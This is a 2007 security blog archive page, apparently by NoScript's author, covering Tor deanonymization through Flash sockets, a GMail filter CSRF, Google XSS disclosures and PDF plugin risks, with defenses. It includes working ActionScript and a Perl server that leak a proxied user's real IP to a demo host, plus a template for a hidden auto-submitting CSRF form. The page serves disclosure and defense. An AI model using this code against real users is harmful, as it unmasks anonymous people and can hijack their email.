Archive for September, 2007

It’s really time to sleep in my timezone, but I just couldn’t resist when I read RSnake’s latest post about Deanonymizing Tor and Detecting Proxies.

The basic concept, not terribly new by the way, is that browser proxy settings cannot be enforced on browser plugins, which happily ignore them in some circumstances, e.g. when establishing a direct TCP socket connection.
So if you’re using a proxy to hide your internet address (like Tor users do), embeddable objects like Java applets can betray you, revealing your real identity to advertisers spying on your habits or, worse, to the police of a repressive state.

This caveat has been preached even on the Tor download page itself, but nothing converts the non-believers better than a few scary demos.

RSnake’s interesting proof of concept exploits JavaScript + LiveConnect, and it apparently works only on Gecko-based browsers with Java™ installed. I didn’t manage to make it work on Opera, even though it does support LiveConnect.

So I decided to defer bedtime a bit and put together my own quick deanonymizing proof of concept, which relies on the almost ubiquitous Macromedia® Flash® and works in any web browser that supports the Flash player, including Internet Explorer (no need for JavaScript, either).
The XMLSocket ActionScript object is used to bypass the browser’s proxy settings and connect to a tiny server written in Perl, listening on port 9999 and echoing the client’s IP.

Here’s the ActionScript code:

    var socket = new XMLSocket();
    socket.onConnect = function(success) {
      socket.onXML = function(doc) {
        getURL("http://evil.hackademix.net/proxy_bypass?ip=" +
               doc.firstChild.firstChild.nodeValue);
        socket.close();
      };
      socket.send(new XML());
    };
    socket.connect("evil.hackademix.net", 9999);

And here’s the Perl server:

    #!/usr/bin/perl -w
    use strict;
    use IO::Socket;

    my $port = shift || 9999;
    my $sock = new IO::Socket::INET(
      LocalPort => $port,
      Proto => 'tcp',
      Listen => SOMAXCONN,
      Reuse => 1);
    $sock or die "socket: $!";
    my ($new_sock, $c_addr);
    while (($new_sock, $c_addr) = $sock->accept())
    {
      my ($client_port, $client_ip) = sockaddr_in($c_addr);
      print $new_sock "<ip>" . inet_ntoa($client_ip) . "</ip>\000";
      $new_sock->close();
    }

Today’s lesson is: if you want to stay anonymous, you’d better turn off Java, Flash and any other plugin!

Update OCT-27

I’ve just learned that some months ago a guy called yawnmoth demonstrated an Unmasking Java Applet. Just like my Flash-based one, it also works in browsers, such as IE, that don’t support LiveConnect.
The lesson above obviously applies, all the more strongly.

Demos

Evil GMail by GoogHOle

If the GoogHOle wasn’t wide enough, yesterday Petko D. Petkov AKA pdp posted another “semi-disclosure” about how you can redirect someone else’s GMail incoming messages to your account.
Petko declared “I am not planning to release this vulnerability for now”, but this counts as a full disclosure in my book, since the details he gives away are far more than enough to put up a proof of concept in 10 minutes, if the reader knows the very basics of Cross Site Request Forgery (CSRF).

  1. The victim must be logged in to GMail.
  2. The victim must visit a malicious web page: the most likely scenarios are clicking an external link from an incoming message, or surfing porn while checking email from time to time.
  3. The malicious web site forges a POST request to GMail’s “Create Filter” wizard, possibly using an invisible auto-submitting form, to build a filter which forwards incoming messages to a mail recipient owned by the attacker.
  4. Since the user is already authenticated, her session cookie is passed along with the forged request and the GMail filter gets silently implanted, with all the output hidden inside an IFRAME.
  5. The new GMail filter now acts as a persistent backdoor stealing incoming messages, and it will go unnoticed forever unless the victim is a GMail power user who creates or edits her own filters from time to time; they are buried deep in the “Settings” user interface: I, for instance, had never seen them until yesterday!

Very clever and very dangerous.
As I said, this surely counts as a 0-day public full disclosure, even though pdp omitted an explicit PoC. How many of us, having minimal web coding experience, would be unable to build a working exploit using the info above?
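To make the point concrete, here’s a sketch of how small such an attack page can be. The endpoint and field names below are made up for illustration only, not GMail’s real parameters; the markup is generated by a little JavaScript helper so you can see all the moving parts at once:

```javascript
// Sketch of the attacker's page: a hidden, auto-submitting POST form
// targeting an invisible IFRAME, so the victim sees nothing.
// The action URL and field names are hypothetical, NOT GMail's real ones.
function buildAutoSubmitPage(action, fields) {
  var inputs = Object.keys(fields).map(function (name) {
    return '<input type="hidden" name="' + name +
           '" value="' + fields[name] + '">';
  }).join('');
  return '<iframe name="sink" style="display:none"></iframe>' +
         '<form method="POST" action="' + action + '" target="sink">' +
         inputs + '</form>' +
         '<script>document.forms[0].submit()<\/script>';
}

var page = buildAutoSubmitPage('https://mail.example.com/createfilter', {
  forward_to: 'attacker@example.com'
});
```

Serve that page anywhere the victim might land while logged in, and the browser does the rest — which is exactly why the “it needs no PoC” argument holds.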

CSRF Countermeasures

As usual, now that it’s been publicly disclosed, this vulnerability is being patched very quickly by the great Google development crew.
Nonetheless, many other holes of this kind are still around. That’s why CSRF is called “The Sleeping Giant”: some web coders may still need to learn how to fix or prevent them, and users surely want to know how to protect themselves.

1. Web Developers

Please use form keys!

  1. Generate a random identifier (form key) every time you display a form meant to be submitted by authenticated users only.
  2. Echo your key as a hidden field of the form and bind its value to the user session data kept on the server side.
  3. As soon as the form is submitted, compare the returned key with the one stored in session data: if they don’t match, throw away the request because it is probably forged.

The above is a simple yet effective anti-CSRF technique. It will work fine unless a further Cross Site Scripting (XSS) vulnerability is also present, allowing the attacker to read your form key on the fly and forge seemingly valid requests.

2. Web Users

This GMail incident proves how even the best trained web developer in the world can fail at implementing CSRF countermeasures.
Most of the existing literature about XSS and CSRF will tell you that poor users can do nothing to protect themselves from these attacks, but this is blatantly false.
A quite radical, not very usable but effective approach would be using a different browser (or a different profile, if you use Mozilla derivatives) for each “sensitive” web site you access, and forcing yourself not to follow any external link nor browse any other site while logged in.

Anyway, if you prefer not to make your life miserable by spawning multiple browsers and scanning every single link with a magnifying lens, your answer is, once again, Firefox + NoScript (sorry to sound repetitive, but that’s it).

First of all, automating a POST request is trivial if JavaScript is enabled on the attacker’s site — a single form.submit() call — but impossible if malicious scripts are blocked by NoScript.
The obvious objection, raised for instance by both pdp and Adrian Pastor at GNUCITIZEN, sounds like:

The attacker could simply build an invisible POST form and disguise its “submit” button as a regular link or an image, then social-engineer his victim into clicking it, launching the exploit even if JavaScript is disabled.

True, but NoScript effectively defeats this attack as well!

A common misconception about NoScript is that it just blocks JavaScript on untrusted sites.
It certainly does, but NoScript actually enhances browser security in several other ways.
A very incomplete list:

  1. It blocks Java, Flash, Silverlight and other plugins on untrusted sites, and optionally also on trusted pages, while letting you activate the plugin content on demand, with a click.
  2. It prevents malformed URIs from exploiting buggy URI handlers, which are the foundation of many cross-application exploits discovered by Billy Rios, Nate McFeters and Thor Larholm.
  3. It implements the most advanced and effective anti-XSS protection available on the client side.

NoScript’s anti-XSS protection deploys various specific countermeasures, e.g. HTML/JavaScript injection detection, URL sanitization on suspicious cross-site requests, UTF-7 encoding neutralization and many others.
One of them also provides an effective defense against CSRF attacks of the kind affecting GMail: in fact, NoScript intercepts POST requests sent from untrusted origins to trusted sites and strips out their payloads.
This means that, even if the attacker exploits a scriptless vector to launch his POST CSRF through social engineering, NoScript users are still safe as long as the malicious site is not explicitly whitelisted.
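Conceptually — and this is just my own illustration of the policy, not NoScript’s actual code — the filter behaves like this:

```javascript
// Conceptual sketch (NOT NoScript's real implementation): a POST coming
// from a non-whitelisted origin toward another site gets downgraded to
// a payload-less GET, so it can no longer change server-side state.
function filterCrossSiteRequest(request, whitelist) {
  var crossSite = request.origin !== request.targetSite;
  var trustedOrigin = whitelist.indexOf(request.origin) !== -1;
  if (request.method === 'POST' && crossSite && !trustedOrigin) {
    return { method: 'GET', origin: request.origin,
             targetSite: request.targetSite, body: null };
  }
  return request;
}
```

The forged filter-creation request from the GMail attack would arrive as a cross-site POST from an untrusted origin, lose its payload, and accomplish nothing.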

When he learned this, pdp commented:

Giorgio, sounds good, but doesn’t that break things?
I mean, CSRF is one of the most fundamental Web characteristic.
Disabling it might be OK for people like us, but for the general population, that is a no go!

Petko, my friend,

  1. The very foundation of the Web is CSR (Cross Site Requests, AKA Hyperlinking), not CSRF (Cross Site Request Forgery) which is an unwanted side effect of bad coding practices.
  2. RFC 2616, which defines HTTP (hence, in a certain sense, the Web itself), clearly states that GET requests (the ones we generate by following hyperlinks or submitting a search form) should be safe and idempotent, i.e. they should not modify the receiving system, while POST is reserved for requests which cause permanent changes. NoScript just prevents untrusted sites from modifying data held by trusted sites, and this looks like Pure Good™: why would you want the contrary?
  3. Even if you actually wanted the contrary, you can either use the “Unsafe reload” command, available whenever a request is filtered by NoScript, or permanently configure some sites of your choice as unfiltered recipients of unsafe requests by listing them in NoScript Options/Advanced/XSS/Exceptions.

The NoScript feature we’re talking about has been in place for more than six months now.
I guess it’s transparent enough if security researchers like you, Adrian or .mario — people “like us”, much more attentive to what happens inside their browsers than “the general population” — did not even notice it… ;)

Not a great month for Google security.
In the past 3 days, several interesting disclosures have been published:

  1. A Google Search Appliance XSS discovered by MustLive, affecting almost 200,000 paying customers of the outsourced search engine and their users: this Google dork showed 196,000 results at the time of disclosure, now dropped to 188,000. Fear effect?
  2. Billy Rios and Nate McFeters revealed the gory details of their already announced Picasa exploit, leveraging a clever combo of XSS, Cross Application Request Forgery, Flash same-domain policy evasion and URI handler weakness exploitation to steal your private pictures, straight from your local hard disk, when you merely visit a malicious web page.
  3. Finally, the simplest yet most impressive, because of the huge number of users involved: beford decided to launch his new blog by disclosing a Google Polls XSS which, thanks to the (too) smart “widget reuse” that lets Google integrate the same functionality across multiple services, can be used to attack Search, Blogspot, Groups and, in the most dramatic exploitation scenario, GMail:

    For such an attack to be successful, the victim just needs to visit a malicious website while logged in to Google, e.g. by following a link from an incoming message (unless she’s got anti-XSS protection).

  4. update — a few hours after I released the first version of this article, I heard of another Google-outsourced vulnerability, an Urchin Login XSS disclosed by GNUCITIZEN’s Adrian Pastor, which could compromise local Google Analytics installations. Its severity may vary depending on how Urchin is installed (e.g. on a domain different from your main site), but the provided proof of concept is quite interesting because it shows an actual credential theft in action, rather than the usual, boring alert('XSS'). Not that a more spectacular example proves anything new about the dangers of XSS, but some people just don’t believe until they can see with their own eyes.

These vulnerabilities are surely being fixed at top speed, since Google is one of the most reactive organizations in this fight, but they’re nonetheless disturbing because they hit the very main player on the field, with the largest user base on the web: this makes incidents of this kind ipso facto unavoidable.
How many vulnerabilities like these just go undisclosed and unpatched, yet are exploited by unethical hacrackers?
In Gareth Heyes‘ words,

This proves everything is insecure, there are just degrees of insecurity.

Talking about XSS, if you’re an end user and you don’t like to stay at the very bottom of the insecurity food chain, you’d better use Firefox with NoScript — but that’s your choice, of course. ;)

I’ve just read on RSnake’s blog that MustLive, a very active Ukrainian researcher, disclosed yet another XSS vulnerability affecting the Google Search Appliance.

The Google Search Appliance starts at $30,000, whereas the Mini starts at $1,995.

This means that about 196,000 web sites, many of them belonging to very important universities and other public bodies, are willing to pay for putting their data and their users at risk.

Last time I checked, putting up a self-hosted search engine was not a terribly hard task, whether you prefer Java, PHP or just plain CGI.
When you discover your own web site is broken, do you really want to depend on someone else for a fix?

Recent explosions of Petko D. Petkov (pdp)’s pwning lust should teach us a lesson: documents should be documents, not programs!

We’ve seen MP3 tunes pwning Firefox (and NoScript promptly counter-pwning), Windows playlists pwning browser security, and finally PDF documents pwning Windows PCs.
This latest “disclosure” sounds like a strange case of pwnatio precox, since Petko didn’t bother to reveal any detail about the flaw. All he said is:

Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one.

I’ve got no problem with believing his words, since the stuff we keep calling “documents” became containers for all kinds of executable code a long time ago, either intentionally (script embedding) or by accident (buffer overflows, often due to overly complex formats driven by creeping featurism).

I (like many people, I guess) do have problems with his suggested work-around:

My advise for you is not to open any PDF files (locally or remotely).

This is something no business can afford, plain and simple.
The real fix would be vendors stopping these crazy mixes of data and code, but that’s something they don’t even seem to be considering.
So, how can we mitigate risks of this kind, which surely won’t go away even after Adobe fixes this specific PDF issue?

OK, I’m obviously biased here, but did you ever notice the NoScript Options/Advanced/Plugins panel?
NoScript content blocking options
It provides quite a flexible way to block Java, Flash, Silverlight and all the other plugins, such as Acrobat Viewer, Windows Media Player and QuickTime, to name just the ones featured in pdp’s research.
If you check all the “Forbid…” checkboxes except the last (IFRAMEs), all types of plugin-handled, potentially dangerous content will be blocked by default when coming from unknown (and therefore untrusted) sites.
You’ll get a nice placeholder with the NoScript logo instead: just click it to activate the content on the fly, if you deem it trustworthy.
If you’re paranoid like me, you may want to trade some usability for maximum security and also check the “Apply these restrictions to trusted sites too” option, which mandates on-demand activation everywhere.

I heard someone say that security × usability = K.
If it’s true (and I hope some day it won’t necessarily be), NoScript tries hard to pump that K as high as it can go.
